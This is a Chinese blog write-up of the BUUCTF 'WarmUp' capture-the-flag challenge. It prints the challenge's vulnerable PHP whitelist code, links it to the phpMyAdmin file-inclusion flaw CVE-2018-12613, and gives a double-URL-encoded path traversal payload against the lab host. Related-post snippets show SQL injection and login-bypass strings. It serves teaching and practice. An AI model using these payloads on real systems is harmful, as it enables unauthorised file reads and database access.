BUUCTF-WEB-WarmUp

最新推荐文章于 2025-06-18 19:21:43 发布
最新推荐文章于 2025-06-18 19:21:43 发布
阅读量710 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: buuctf 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43345082/article/details/97376434
本文深入分析了CVE-2018-12613,即PhpMyadmin文件包含漏洞的具体细节,探讨了其成因、利用方式及修复方法,为读者提供了丰富的安全防护知识。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

source.php页面看源码


 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
            if (in_array($page, $whitelist)) {
                return true;
            }
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  ?>

这是CVE-2018-12613 PhpMyadmin文件包含漏洞
百度有很多分析的帖子

再如
payload:  xxxx.php%253F/…/…/…/…/xxxx

对这道题就是
http://web5.buuoj.cn/?file=payload
要注意的是目录的问题
http://web5.buuoj.cn/?file=hint.php%253F/hint.php
这样不是当前目录,要加一个/…
http://web5.buuoj.cn/?file=hint.php%253F/…/source.php
这个才是当前目录

一层层目录找
最后在这里拿到flag
http://web5.buuoj.cn/?file=hint.php%253F/…/…/…/…/ffffllllaaaagggg

BUUCTF web WarmUp
A_dmin的博客
06-07 1万+
BUUCTF web WarmUp 一天一道CTF题目,能多不能少 打开页面,一个滑稽,查看源码,得到source.php,输入得到源码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { ...
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2619
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
Buuctf-web-Warm Up
Ch_an_ger的博客
10-12 442
作为一个白名单验证的代码审计题,而且文件只能包含source.php和hint.php,先把注释了的源码贴出来 从代码看来这个审计是要求传一个参数file并未参数内容要在白名单之内,并且是三次检查,第三次检查还将参数进行了URL解码,先解释一下mb_strops()函数的意思是截取出参数内容中?之前的字符串并进行返回,在源码里能看到还出现了hint.php文件,可以尝试去访问这个文件, 这就使...
buuctf web+basic
最新发布
2301_76767854的博客
06-18 337
打开靶站,发现需要登陆,尝试用弱口令爆破,账号admin,判断时候存在注入,密码用“1‘or’1‘=’1”,发现登陆成功,得到flag。打开靶站,发现以下界面,尝试用弱口令爆破,输入admin,password,显示密码错误为4位数字,说明账号正确,密码错误。它说和flag在ffffllllaaaagggg里,判断其应是一个文件,构造file。先判断是字符型注入还是数字性注入,发现输入字符无响应,输入数字有以下回应。打开hint.php,发现flag不在这里。打开靶站,发现是一只小猫。
buuctf--web篇01WarmUp
Xor0ne
06-14 944
0x01 [HCTF 2018]WarmUp 参考链接:https://blog.youkuaiyun.com/zouchengzhi1021/article/details/104173137 打开源码,发现source.php字样,添加在后面,然后就看见了php代码。如下: <?php highlight_file(__FILE__);//highlight_file() 函数对文件进行语法高亮显示。 class emmm { public static functio
[BUUCTF-web] warmup
qq_45766280的博客
08-12 196
BUUCTF-web warmup知识点题目 知识点 php代码审计 phpmyadmin 4.8.1的一个远程文件包含的漏洞 目录穿越 题目 打开靶机,只有一张图,先F12 有东西,转到这个文件中 有代码,代码审计没跑了 先来看看代码 里面有设置白名单 $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; 去hint.php里看看 果然没有那么简单,还是回去老老实实的看代码吧 <?php highlight_file(_
BUUCTF[HCTF 2018]WarmUp 1
10-21
CTF竞赛是网络安全领域中的一项竞技活动,通常包括解密、编码、二进制分析、逆向工程和Web漏洞挖掘等多种类型。在CTF竞赛中,参赛者通常需要解决一系列涉及网络安全的知识点和逻辑问题。 7. **文件包含漏洞**: ...
BUUCTF-WEB
ccfly1012的博客
11-02 4148
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1407
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
BUUCTF web题目 之WarmUp
m0_54993799的博客
12-10 1941
BUUCTF web题目之WarmUp
BUUCTF-web warmup wp
想喝奶茶的胖大海
02-12 575
查看源码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv...
BUUCTF——Warmup
weixin_44866139的博客
04-30 1481
Warmup <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint....
BUUCTF-WarmUp
硫酸超的博客
11-20 5263
BUUCTF-WarmUp(代码审计) 1、打开靶场后,查看源码即可看到 <!--source.php--> 2、进入sourcep.php 代码如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.ph
BUUCTF Web WarmUp1
qq_52429415的博客
03-07 799
BUUCTF Web WarmUp1 进入网站后发现什么也没有 按F12查看原代码,发现PHP发现新的PHP(hit.php) 发现flag在ffffllllaaaagggg中 仔细分析代码 因为flag在ffffllllaaaagggg中 为了读到ffffllllaaaagggg 可以加?file=source.php?/ffffllllaaaagggg 因为传入后服务器会自动解一次码 所以第二个问号要自己url加密一次 ?file=source.php%3f/ffffllllaaaagggg 因为后来还
buuctf——Warmup
qq_51796436的博客
03-05 1280
打开题目F12有注释source.php 那访问网址:题目/source.php出现如下题目代码:
buuctf warmup
01-13
### BUUCTF Warmup 题目解决方案 在处理BUUCTF平台上的Warmup题目时,通常这些题目旨在帮助参赛者熟悉比赛环境和基本技巧。对于warmup_csaw_2016这类涉及栈溢出覆盖返回地址的题目[^3],解决方法主要依赖于理解程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值